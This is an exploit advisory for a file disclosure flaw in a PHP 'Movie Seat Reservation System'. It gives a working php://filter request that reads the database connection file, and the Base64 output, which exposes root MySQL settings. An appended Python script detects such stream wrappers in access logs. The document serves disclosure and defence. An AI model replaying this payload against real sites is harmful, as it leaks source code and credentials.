Movie Seat Reservation System File Disclosure
Exploit
http://192.168.1.101:8080/Movie_Seat_Reservation_System/index.php?page=home
Use Burp Suite to capture the request, set the payload, and send it.
Then decode the Base64 in the response:
PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywnJywndGhlYXRlcl9kYicpb3IgZGllKCJDb3VsZCBub3QgY29ubmVjdCB0byBteXNxbCIubXlzcWxpX2Vycm9yKCRjb24pKTsNCg==
Vulnerable Code
POC
GET /Movie_Seat_Reservation_System/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1
Host: 192.168.1.101:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.101:8080/Movie_Seat_Reservation_System/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=0722dtqnb1dgvuono8uubajcae
Connection: close
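Detection sketch for the request above, added here as an example and not part of the original advisory: it scans web-server access logs for a PHP stream wrapper in the page parameter, including percent-encoded forms. The log format (combined), the sample lines, and the function names are assumptions; the wrapper list generalizes beyond the php://filter case shown in the PoC.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed access-log lines (combined log format); not from a real server.
_PFX = '192.168.1.50 - - [01/Jan/2022:10:00:00 +0000] "GET /Movie_Seat_Reservation_System/index.php?'
SAMPLE_LOG = [
    _PFX + 'page=home HTTP/1.1" 200 5120',
    _PFX + 'page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1" 200 812',
    _PFX + 'page=PHP%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dadmin%2Fdb_connect HTTP/1.1" 200 812',
    _PFX + 'page=movies&ref=http://example.com/ HTTP/1.1" 200 4301',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# PHP stream wrappers that an include() on user input may resolve.
WRAPPER_RE = re.compile(
    r'^\s*(?:(?:php|expect|zip|phar|file|glob|ftp|https?)://|data:)', re.I)


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly (bounded) so nested encoding cannot hide a wrapper."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(lines, param="page"):
    """Return (line_number, decoded_value) for each wrapper found in `param`."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # The logged target is raw, so split off the query string ourselves.
        _, _, query = match.group(1).partition("?")
        for raw in parse_qs(query, keep_blank_values=True).get(param, []):
            value = fully_decode(raw)
            if WRAPPER_RE.match(value):
                findings.append((number, value))
    return findings


if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: stream wrapper in page parameter: {value}")
```

Only the page parameter is inspected, so a URL carried in an unrelated parameter (the last sample line) is not flagged.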